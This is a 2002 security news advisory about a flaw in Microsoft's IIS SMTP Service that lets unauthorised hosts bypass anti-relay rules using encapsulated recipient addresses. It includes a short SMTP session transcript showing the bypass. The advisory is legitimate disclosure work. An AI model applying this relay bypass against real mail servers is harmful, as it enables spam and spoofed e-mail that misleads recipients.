Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » IIS Microsoft SMTP Service Encapsulated SMTP Address Vulnerability

IIS Microsoft SMTP Service Encapsulated SMTP Address Vulnerability

by Nikola Strahija on July 12th, 2002 Laurent Frinking of Quark Deutschland GmbH originally discovered this vulnerability. At that time the discovery concerned all versions of Microsoft Exchange 5.5 prior to SP2 with the SP2 IMC patch.


Portcullis have discovered that the Microsoft SMTP Service available with
IIS 4.0 and IIS 5.0 is also vulnerable to the encapsulated SMTP address
vulnerability even with anti-relaying features enabled.
This vulnerability allows hosts that are not authorized to relay e-mail via
the SMTP server to bypass the anti-relay features and send mail to foreign
domains.

Impact:

The anti-relay rules will be circumvented allowing spam and spoofed mail to
be relayed via the SMTP mail server.

Spam Mail:
If the Microsoft IIS SMTP Server is used to relay spam mail this could
result in the mail server being black holed causing disruption to the
service.

Spoofed e-mail:
As the Microsoft IIS SMTP Service is most often utilised in conjunction with
IIS for commercial use this flaw could be used in order to engineer
customers particularly because spoofed e-mail relayed in this way will show
the trusted web server in the SMTP header.

Exploit:

220 test-mailer Microsoft ESMTP MAIL Service, Version: 5.0.2195.4905 ready
at
Tue, 28 May 2002 14:54:10 +0100
helo
250 test-mailer Hello [IP address of source host]
MAIL FROM: [email protected]
250 2.1.0 [email protected] OK
RCPT TO: [email protected]
550 5.7.1 Unable to relay for [email protected]
RCPT TO: [email protected]
250 2.1.5 [email protected]
data
354 Start mail input; end with .
Subject: You are vulnerable.



Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »